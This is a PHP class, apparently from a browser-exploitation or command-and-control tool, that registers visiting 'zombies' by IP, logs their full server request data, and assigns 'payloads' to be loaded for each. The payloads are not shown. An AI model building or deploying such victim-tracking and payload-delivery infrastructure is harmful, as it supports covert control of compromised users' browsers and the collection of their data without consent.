<?php
   if(!defined('ANTIBUG')) exit;
   
   require_once(PLOUF_PATH.'Database.php');
   
   /*
    * This model manages the zombies
    */
   class Zombie
   {
      static private $instance=null;
      
      private $db;
      private $id;
      private $ip;
      private $information;
      
      private function __construct()
      {
         $this->db = Database::getInstance();
         if($this->db==false)
            die("Unable to connect to the database server");
            
         $this->ip=mysql_real_escape_string($_SERVER['REMOTE_ADDR']);
         $this->information=mysql_real_escape_string(json_encode($_SERVER));
         $this->id=$this->getID();
      }
      
      // singleton design pattern
      static public function getInstance()
      {
         if(self::$instance==null)
         {
            self::$instance=new Zombie();       
         }
         return self::$instance;
      }
      
      /*
       * Get the zombie id in the database
       * @return mixed the zombie id or null if he's not in the database
       */
      public function getID()
      {
         if(!is_integer($this->id))
         {
            $SQLQuery="SELECT id FROM zombie WHERE ip='$this->ip'";
            $Query=$this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
            
            if($this->db->numRows($Query)!=0 && $id=$this->db->fetchResult($Query, 0))
               return $this->id=intval($id);
            else
               return null;
         }
         else
            return $this->id;
      }
      
      /*
       * Update a zombie in the database.
       * 
       * Insert a new zombie if the zombie isn't already registered in our database,
       * or update its informations
       */
      public function update()
      {
         $date=date('Ymdhis');
         
         $SQLQuery = "SELECT ip FROM zombie WHERE ip = '$this->ip'";
         $query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
         
         // we verify if the zombie already exists in our database
         if($this->db->numRows($query)!=0)
         {
            // if the zombie already exists we update its informations
            $SQLQuery = "UPDATE zombie SET informations='$this->information', last_connect_date='$date' WHERE ip='$this->ip'";
            $query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
         }
         else
         {
            // if the zombie does not exists we insert it in the database
            $SQLQuery = "INSERT INTO zombie (ip, last_connect_date, informations) VALUES ('$this->ip', '$date', '$this->information')";
            $query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
         }
      }
      
      /*
       * Return the names of the payloads to load for the zombie
       * 
       * @return  an array containing the names of all the payloads to load
       */
      public function getPayloads()
      {
         $PAYLOADS=array();
         // firstly we check for payloads that are specific to the zombie
         $SQLQuery="SELECT payload.name FROM zombie_to_payload, payload, zombie
            WHERE zombie.ip = '$this->ip'
            AND zombie.id = zombie_to_payload.zombie_id 
            AND payload.id = zombie_to_payload.payload_id";
         $query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
         
         if($this->db->numRows($query)!=0)
         {
            while($row = $this->db->fetchAssoc($query)) {
               // we push the payload in our list of payload to load :)
               array_push($PAYLOADS, $row['name']);
            }
         }
         
         //secondly we check for automatic payloads
         $SQLQuery = "SELECT name FROM payload WHERE is_automatic=1";
         $query = $this->db->query($SQLQuery) or $this->dieError(__FILE__, __LINE__);
         
         if($this->db->numRows($query)!=0)
         {
            while($row = $this->db->fetchAssoc($query)) {
               // we push the payload in our list of payload to load :)
               array_push($PAYLOADS, $row['name']);
            }
         }
         $PAYLOADS = array_unique($PAYLOADS);
         sort($PAYLOADS);
         
         return $PAYLOADS;
      }
      
      /*
       * Attach a new payload to a zombie
       * @param string $payload_name the name of the payload to attach to the zombie
       * @return bool   true if success, false if payload does not exist
       */
      public function attachPayload($payload_name)
      {
         if(!is_null($this->id) && is_string($payload_name))
         {
            $payload_name=mysql_real_escape_string($payload_name);
            $SQLQuery="SELECT id FROM payload WHERE name='$payload_name'";
            $Query=$this->db->query($SQLQuery) or $this->dieError(__FILE__, __LINE__);
            
            if($this->db->numRows($Query)!=0 && $payload_id=$this->db->fetchResult($Query, 0))
            {
               $payload_id=intval($payload_id);
               $SQLQuery="INSERT INTO zombie_to_payload (zombie_id, payload_id) VALUES ($this->id, $payload_id)";
               $Query=$this->db->query($SQLQuery) or $this->dieError(__FILE__, __LINE__);
            }
         }
         else
            return false;
      }
   }
?>
